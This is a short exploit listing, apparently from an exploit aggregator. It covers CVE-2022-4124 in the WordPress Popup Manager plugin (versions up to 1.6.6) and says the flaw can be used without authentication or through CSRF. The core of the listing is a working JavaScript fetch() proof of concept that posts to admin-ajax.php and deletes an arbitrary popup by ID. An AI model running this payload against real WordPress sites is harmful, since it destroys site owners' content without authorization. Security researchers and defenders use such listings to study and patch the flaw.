Exploit for Popup Manager <= 1.6.6 - Unauthenticated Arbitrary Popup Deletion CVE-2022-4124

Name: Exploit for Popup Manager <= 1.6.6 - Unauthenticated Arbitrary Popup Deletion CVE-2022-4124
Rating: 5 (54 reviews)

2022-11-28 | CVSS 1.7

## https://sploitus.com/exploit?id=WPEX-ID:60786BF8-C0D7-4D80-B189-866ABA79BCE2
As an unauthenticated users, or via CSRF:

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=pm_delete_popup&popup_id=2',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));